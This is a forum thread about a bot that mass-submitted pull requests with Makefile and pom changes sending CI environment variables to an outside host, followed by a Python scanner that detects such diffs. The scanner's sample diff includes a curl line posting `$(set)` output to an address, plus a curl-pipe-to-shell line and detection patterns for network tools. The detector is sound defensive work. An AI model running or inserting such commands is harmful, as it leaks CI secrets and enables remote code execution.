27

A bot just made 519 pull requests with malicious Makefile code to get a GitHub Actions server to send a curl to a random host.

It's gonna be one of those days

Comments
  • 3
    Update: User is banned now
  • 3
    Looks like a malfunction - doesn't make sense for a bot to spam a single repo as it increases the likelihood of sleepy maintainers getting that something is wrong about those pull requests.
  • 2
    @Oktokolo My mistake, it made PRs on different repos with pom and Makefile updates, sending the output of set to a random server. The title mentioned a bug bounty, so it's fishing for that
  • 2
    @alexbrooklyn That's odd. Mentioning wanting money for the fix makes maintainers hunt extra hard for reasons not to accept the pull request.
  • 1
    @Oktokolo they don't want the PR to be accepted, they want to find holes in whatever CI/CD system is running the pipeline for the pull request
  • 1
    @alexbrooklyn okay, that makes sense. Well, at least scripting languages always come with automatic memory management - so the most common RCE vectors are already closed...
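The pattern the thread describes (a PR that edits a Makefile or pom to post the output of `set` to an outside host) is cheap to flag before the CI pipeline ever runs. The scanner below is an added example, not code from the thread or from GitHub: it walks a unified diff and reports added lines in build files that both reach out to the network and dump the environment. The file list, the regexes and the sample diff (with a TEST-NET address) are constructed assumptions for illustration.

```python
"""Flag PR diffs that add outbound network calls or environment dumps to build files."""
import re

# Constructed list of files whose contents CI executes; extend for your stack.
BUILD_FILES = re.compile(r"(^|/)(Makefile|GNUmakefile|pom\.xml|build\.gradle|setup\.py|package\.json)$")
# Network client plus a URL or literal IPv4 address on the same added line.
NET_CALL = re.compile(r"\b(curl|wget|nc|ncat)\b.*?(https?://|\d{1,3}(\.\d{1,3}){3})")
# Shell forms that capture the whole environment: $(set), `env`, printenv | ...
ENV_DUMP = re.compile(r"(\$\((set|env|printenv)\)|`(set|env|printenv)`|\b(set|env|printenv)\s*\|)")


def scan_diff(diff_text):
    """Return (file, new_line_no, reason) for suspicious added lines in build files."""
    findings, current, new_line = [], None, 0
    for line in diff_text.splitlines():
        if line.startswith("+++ "):                      # new-side file header
            current = line[4:].strip()
            current = current[2:] if current.startswith("b/") else current
            continue
        if line.startswith("--- "):
            continue
        hunk = re.match(r"@@ -\d+(?:,\d+)? \+(\d+)", line)
        if hunk:                                         # reset new-side line counter
            new_line = int(hunk.group(1))
            continue
        if line.startswith("+"):                         # added line: inspect it
            if current and BUILD_FILES.search(current):
                body, reasons = line[1:], []
                if NET_CALL.search(body):
                    reasons.append("outbound network call")
                if ENV_DUMP.search(body):
                    reasons.append("environment dump")
                if reasons:
                    findings.append((current, new_line, ", ".join(reasons)))
            new_line += 1
        elif not line.startswith("-"):                   # context line, also counts
            new_line += 1
    return findings


# Constructed sample: a Makefile hunk like the thread describes, plus a benign README edit.
SAMPLE_DIFF = """\
diff --git a/Makefile b/Makefile
--- a/Makefile
+++ b/Makefile
@@ -1,3 +1,5 @@
 all: build
+
+prebuild:
+\tcurl -s -X POST --data "$$(set)" http://203.0.113.7/collect
 build:
 \tgo build ./...
diff --git a/README.md b/README.md
--- a/README.md
+++ b/README.md
@@ -1 +1,2 @@
 # Project
+Install with: curl -sSL https://example.com/install.sh | sh
"""

if __name__ == "__main__":
    for path, lineno, why in scan_diff(SAMPLE_DIFF):
        print(f"{path}:{lineno}: {why}")
```

Only the Makefile line is reported; the README edit mentions curl but is not a file CI executes, so it stays out of the findings.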